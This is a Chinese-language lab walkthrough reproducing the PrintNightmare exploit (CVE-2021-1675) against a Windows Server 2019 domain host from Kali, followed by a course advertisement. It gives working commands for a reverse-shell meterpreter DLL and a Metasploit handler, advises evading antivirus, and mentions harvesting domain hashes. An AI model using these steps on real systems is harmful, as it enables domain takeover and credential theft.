文章來源|MS08067安全實驗室
本文作者:龍諾(Web知識星球追洞小組)
實驗環境:windows2019 (192.168.189.145)
kali linux (192.168.189.146)
需要:一個普通的域帳戶
需要:開啟 print spooler服務
使用反彈shell :需要關閉windows2019的安全中心 或者用免殺
需要:windows2019安裝smb1協議(沒有這個會報錯)
二 搭建環境安裝impacket我這裡使用的是python虛擬環境安裝搭建這樣的好處是不破壞系統環境,因為python有時候安裝各種模塊多了容易衝突所一我們使用虛擬環境。
構造虛擬環境virtualenv -p python3 文件夾
如果沒有virtualenv的話需要你pip安裝模塊
構造完成以後我們使用
source 文件夾/bin/activate
進入後我們去github下載poc安裝
git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket
首先要下載poc impacket模塊然後安裝
因為我們使用的是虛擬環境所以我們可以直接安裝安裝完以後切換到poc處就可以了
source 文件夾/bin/activate python setup.py install python CVE-2021-1675.py -h
[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2
[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes
按照這個配置以後就可以使用impacket-smbserver 文件名、目錄、開啟伺服器,如圖生成dll和啟動msfmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.189.146 LPORT=4444 -f dll -o /tmp/rever.dll msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp exploit
python CVE-2021-1675.py demonba.xxx/yuce:Hello7p@192.168.189.145 '\\192.168.189.146\smb\rever.dll'
如果出錯則需要安裝smb1在windows2019上出錯代碼,下圖
可以現在2019連接smb伺服器出現這種報錯
成功,下圖
impacket-smbserver伺服器也會有數據交互
同時會有反彈shell
我們可以直接查看域中帳戶hash 進行橫向滲透
dll文件在windows上傳成功,如果開著windows安全中心會出現圖
上傳不成功
這裡就要考慮免殺了,切記只能是普通帳戶
漏洞掃描https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare
需要了解smb配置
windows2019域配置
在kali無法連接2019的時候逆向思考看看2019可以連接smb共享文件碼?
https://github.com/cube0x0/CVE-2021-1675/issues/36 這裡也有人問這個問題我不知道他解決了嗎?
我是受下面一句話很長時間突然開悟了2019可以連結嗎?
復現看著簡單但是各種環境問題還有小白配置問題只有復現了才知道!
追洞小組負責人Taoing主講
WEB高級攻防實戰班 第1期 來襲
課程圍繞:外圍打點、邊界突破、PHP審計、SRC漏洞挖掘、應急響應
*大綱僅作為參考,會根據當期進度有所變化(加客服獲取高清課程導圖)
詳情諮詢請聯繫小客服
掃描下方二維碼加入星球學習
加入後邀請你進入內部微信群,內部微信群永久有效!